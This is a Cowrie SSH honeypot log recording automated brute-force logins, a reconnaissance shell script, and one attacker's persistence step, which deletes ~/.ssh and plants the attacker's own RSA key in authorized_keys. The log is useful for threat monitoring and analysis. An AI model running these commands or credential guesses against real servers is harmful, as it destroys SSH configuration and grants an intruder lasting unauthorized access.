{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57306,"dst_ip":"1.2.3.4","dst_port":22,"session":"4ba1d93ba49d","protocol":"ssh","message":"New connection: 212.227.235.229:57306 (1.2.3.4:22) [session: 4ba1d93ba49d]","sensor":"my-vps","timestamp":"2025-08-31T07:26:22.102931Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-31T07:26:22.103729Z","src_ip":"212.227.235.229","session":"4ba1d93ba49d"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T07:26:22.164973Z","src_ip":"201.148.180.50","session":"4a99cbc7a91e"}
{"eventid":"cowrie.command.input","input":"mount | head -5","message":"CMD: mount | head -5","sensor":"my-vps","timestamp":"2025-08-31T07:26:22.165770Z","src_ip":"201.148.180.50","session":"4a99cbc7a91e"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-31T07:26:22.231431Z","src_ip":"212.227.235.229","session":"4ba1d93ba49d"}
{"eventid":"cowrie.login.failed","username":"odoo","password":"odoo","message":"login attempt [odoo/odoo] failed","sensor":"my-vps","timestamp":"2025-08-31T07:26:22.786411Z","src_ip":"212.227.235.229","session":"4ba1d93ba49d"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/eff265ce3fe88cc50aec4fb21ef2fa5564c880aafa6cd111cad97c6281d0b410","size":28,"shasum":"eff265ce3fe88cc50aec4fb21ef2fa5564c880aafa6cd111cad97c6281d0b410","duplicate":true,"duration":"1.0","message":"Closing TTY Log: var/lib/cowrie/tty/eff265ce3fe88cc50aec4fb21ef2fa5564c880aafa6cd111cad97c6281d0b410 after 1.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:26:23.163841Z","src_ip":"201.148.180.50","session":"4a99cbc7a91e"}
{"eventid":"cowrie.session.closed","duration":"10.0","message":"Connection lost after 10.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:26:23.164939Z","src_ip":"201.148.180.50","session":"4a99cbc7a91e"}
{"eventid":"cowrie.login.failed","username":"odoo","password":"admin","message":"login attempt [odoo/admin] failed","sensor":"my-vps","timestamp":"2025-08-31T07:26:23.916901Z","src_ip":"212.227.235.229","session":"4ba1d93ba49d"}
{"eventid":"cowrie.login.failed","username":"odoo","password":"abc123","message":"login attempt [odoo/abc123] failed","sensor":"my-vps","timestamp":"2025-08-31T07:26:25.047687Z","src_ip":"212.227.235.229","session":"4ba1d93ba49d"}
{"eventid":"cowrie.login.failed","username":"odoo","password":"abcd123","message":"login attempt [odoo/abcd123] failed","sensor":"my-vps","timestamp":"2025-08-31T07:26:26.178124Z","src_ip":"212.227.235.229","session":"4ba1d93ba49d"}
{"eventid":"cowrie.login.failed","username":"odoo","password":"abcd1234","message":"login attempt [odoo/abcd1234] failed","sensor":"my-vps","timestamp":"2025-08-31T07:26:27.308726Z","src_ip":"212.227.235.229","session":"4ba1d93ba49d"}
{"eventid":"cowrie.session.closed","duration":"6.4","message":"Connection lost after 6.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:26:28.456775Z","src_ip":"212.227.235.229","session":"4ba1d93ba49d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":52326,"dst_ip":"1.2.3.4","dst_port":22,"session":"55df14fc30a2","protocol":"ssh","message":"New connection: 212.227.125.160:52326 (1.2.3.4:22) [session: 55df14fc30a2]","sensor":"my-vps","timestamp":"2025-08-31T07:26:33.975395Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T07:26:33.976645Z","src_ip":"212.227.125.160","session":"55df14fc30a2"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T07:26:34.142108Z","src_ip":"212.227.125.160","session":"55df14fc30a2"}
{"eventid":"cowrie.login.success","username":"root","password":"1234","message":"login attempt [root/1234] succeeded","sensor":"my-vps","timestamp":"2025-08-31T07:26:34.636489Z","src_ip":"212.227.125.160","session":"55df14fc30a2"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T07:26:34.982688Z","src_ip":"212.227.125.160","session":"55df14fc30a2"}
{"eventid":"cowrie.command.input","input":"uname=$(uname -s -v -n -m 2>/dev/null);; \t\tarch=$(uname -m 2>/dev/null);; \t\tuptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s\", \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null);; \t\t[ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; };; \t\tcpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1);; \t\tcpu_model=$( (grep -m1 \"model name\" /proc/cpuinfo | cut -d: -f2 | sed 's/^ //;s/ *$//' || lscpu | grep -m1 \"Model name\" | cut -d: -f2 | sed 's/^ //;s/ *$//') 2>/dev/null);; \t\tgpu_info=$( (lspci | grep -i vga; lspci | grep -i nvidia) 2>/dev/null | head -n5);; \t\tcat_help=$((cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1);; \t\tls_help=$((ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1);; \t\tlast_output=$((last | tail -n 10) || last);; \t\techo \"UNAME:$uname\";; \t\techo \"ARCH:$arch\";; \t\techo \"UPTIME:$uptime\";; \t\techo \"CPUS:$cpus\";; \t\techo \"CPU_MODEL:$cpu_model\";; \t\techo \"GPU:$gpu_info\";; \t\techo \"CAT_HELP:$cat_help\";; \t\techo \"LS_HELP:$ls_help\";; \t\techo \"LAST:$last_output\";","message":"CMD: uname=$(uname -s -v -n -m 2>/dev/null);; \t\tarch=$(uname -m 2>/dev/null);; \t\tuptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s\", \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null);; \t\t[ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; };; \t\tcpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1);; \t\tcpu_model=$( (grep -m1 \"model name\" /proc/cpuinfo | cut -d: -f2 | sed 's/^ //;s/ *$//' || lscpu | grep -m1 \"Model name\" | cut -d: -f2 | sed 's/^ //;s/ *$//') 2>/dev/null);; \t\tgpu_info=$( (lspci | grep -i vga; lspci | grep -i nvidia) 2>/dev/null | head -n5);; \t\tcat_help=$((cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1);; \t\tls_help=$((ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1);; \t\tlast_output=$((last | tail -n 10) || last);; \t\techo \"UNAME:$uname\";; \t\techo \"ARCH:$arch\";; \t\techo \"UPTIME:$uptime\";; \t\techo \"CPUS:$cpus\";; \t\techo \"CPU_MODEL:$cpu_model\";; \t\techo \"GPU:$gpu_info\";; \t\techo \"CAT_HELP:$cat_help\";; \t\techo \"LS_HELP:$ls_help\";; \t\techo \"LAST:$last_output\";","sensor":"my-vps","timestamp":"2025-08-31T07:26:34.983400Z","src_ip":"212.227.125.160","session":"55df14fc30a2"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -m 2 > /dev/null","message":"CMD: uname -s -v -n -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-31T07:26:34.984005Z","src_ip":"212.227.125.160","session":"55df14fc30a2"}
{"eventid":"cowrie.command.input","input":"uname -m 2 > /dev/null","message":"CMD: uname -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-31T07:26:34.984935Z","src_ip":"212.227.125.160","session":"55df14fc30a2"}
{"eventid":"cowrie.command.input","input":"awk {u=int($1","message":"CMD: awk {u=int($1","sensor":"my-vps","timestamp":"2025-08-31T07:26:34.986271Z","src_ip":"212.227.125.160","session":"55df14fc30a2"}
{"eventid":"cowrie.command.input","input":"cat /proc/uptime | cut -d -f1 | cut -d. -f1","message":"CMD: cat /proc/uptime | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-08-31T07:26:34.987015Z","src_ip":"212.227.125.160","session":"55df14fc30a2"}
{"eventid":"cowrie.command.failed","input":"cat /proc/uptime | cut -d -f1 | cut -d. -f1","message":"Command not found: cat /proc/uptime | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-08-31T07:26:34.987983Z","src_ip":"212.227.125.160","session":"55df14fc30a2"}
{"eventid":"cowrie.command.input","input":"(secondsStr","message":"CMD: (secondsStr","sensor":"my-vps","timestamp":"2025-08-31T07:26:34.989264Z","src_ip":"212.227.125.160","session":"55df14fc30a2"}
{"eventid":"cowrie.command.input","input":"(seconds/86400","message":"CMD: (seconds/86400","sensor":"my-vps","timestamp":"2025-08-31T07:26:34.989773Z","src_ip":"212.227.125.160","session":"55df14fc30a2"}
{"eventid":"cowrie.command.input","input":"( (seconds%86400","message":"CMD: ( (seconds%86400","sensor":"my-vps","timestamp":"2025-08-31T07:26:34.990247Z","src_ip":"212.227.125.160","session":"55df14fc30a2"}
{"eventid":"cowrie.command.input","input":"(seconds%86400","message":"CMD: (seconds%86400","sensor":"my-vps","timestamp":"2025-08-31T07:26:34.990757Z","src_ip":"212.227.125.160","session":"55df14fc30a2"}
{"eventid":"cowrie.command.input","input":"( (seconds%3600","message":"CMD: ( (seconds%3600","sensor":"my-vps","timestamp":"2025-08-31T07:26:34.991642Z","src_ip":"212.227.125.160","session":"55df14fc30a2"}
{"eventid":"cowrie.command.input","input":"(seconds%3600","message":"CMD: (seconds%3600","sensor":"my-vps","timestamp":"2025-08-31T07:26:34.991992Z","src_ip":"212.227.125.160","session":"55df14fc30a2"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","shasum":"1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","destfile":"/dev/null","message":"Saved redir contents with SHA-256 1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057 to var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","sensor":"my-vps","timestamp":"2025-08-31T07:26:35.157705Z","src_ip":"212.227.125.160","session":"55df14fc30a2"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c","size":74,"shasum":"ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:26:35.158724Z","src_ip":"212.227.125.160","session":"55df14fc30a2"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:26:35.161133Z","src_ip":"212.227.125.160","session":"55df14fc30a2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37120,"dst_ip":"1.2.3.4","dst_port":22,"session":"1ea2d890fb3c","protocol":"ssh","message":"New connection: 212.227.235.229:37120 (1.2.3.4:22) [session: 1ea2d890fb3c]","sensor":"my-vps","timestamp":"2025-08-31T07:26:35.512526Z"}
{"eventid":"cowrie.session.connect","src_ip":"45.78.196.218","src_port":57936,"dst_ip":"1.2.3.4","dst_port":22,"session":"277c373d42a6","protocol":"ssh","message":"New connection: 45.78.196.218:57936 (1.2.3.4:22) [session: 277c373d42a6]","sensor":"my-vps","timestamp":"2025-08-31T07:26:35.556956Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T07:26:35.558028Z","src_ip":"45.78.196.218","session":"277c373d42a6"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T07:26:35.624747Z","src_ip":"212.227.235.229","session":"1ea2d890fb3c"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-31T07:26:35.747258Z","src_ip":"45.78.196.218","session":"277c373d42a6"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T07:26:35.790265Z","src_ip":"212.227.235.229","session":"1ea2d890fb3c"}
{"eventid":"cowrie.session.connect","src_ip":"102.210.148.92","src_port":38168,"dst_ip":"1.2.3.4","dst_port":22,"session":"43ecfe3fac2b","protocol":"ssh","message":"New connection: 102.210.148.92:38168 (1.2.3.4:22) [session: 43ecfe3fac2b]","sensor":"my-vps","timestamp":"2025-08-31T07:26:37.178220Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T07:26:37.178895Z","src_ip":"102.210.148.92","session":"43ecfe3fac2b"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T07:26:37.358124Z","src_ip":"102.210.148.92","session":"43ecfe3fac2b"}
{"eventid":"cowrie.login.failed","username":"controll","password":"controll12345","message":"login attempt [controll/controll12345] failed","sensor":"my-vps","timestamp":"2025-08-31T07:26:38.112860Z","src_ip":"102.210.148.92","session":"43ecfe3fac2b"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:26:39.293831Z","src_ip":"102.210.148.92","session":"43ecfe3fac2b"}
{"eventid":"cowrie.login.success","username":"root","password":"Q1w2e3r4.","message":"login attempt [root/Q1w2e3r4.] succeeded","sensor":"my-vps","timestamp":"2025-08-31T07:26:43.048858Z","src_ip":"212.227.235.229","session":"1ea2d890fb3c"}
{"eventid":"cowrie.session.closed","duration":"8.0","message":"Connection lost after 8.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:26:43.557853Z","src_ip":"45.78.196.218","session":"277c373d42a6"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T07:26:43.686215Z","src_ip":"212.227.235.229","session":"1ea2d890fb3c"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T07:26:43.686904Z","src_ip":"212.227.235.229","session":"1ea2d890fb3c"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T07:26:43.687839Z","src_ip":"212.227.235.229","session":"1ea2d890fb3c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"1.6","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:26:45.295774Z","src_ip":"212.227.235.229","session":"1ea2d890fb3c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T07:26:45.985148Z","src_ip":"212.227.235.229","session":"1ea2d890fb3c"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-31T07:26:45.986041Z","src_ip":"212.227.235.229","session":"1ea2d890fb3c"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-31T07:26:46.428964Z","src_ip":"212.227.235.229","session":"1ea2d890fb3c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.4","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:26:46.430089Z","src_ip":"212.227.235.229","session":"1ea2d890fb3c"}
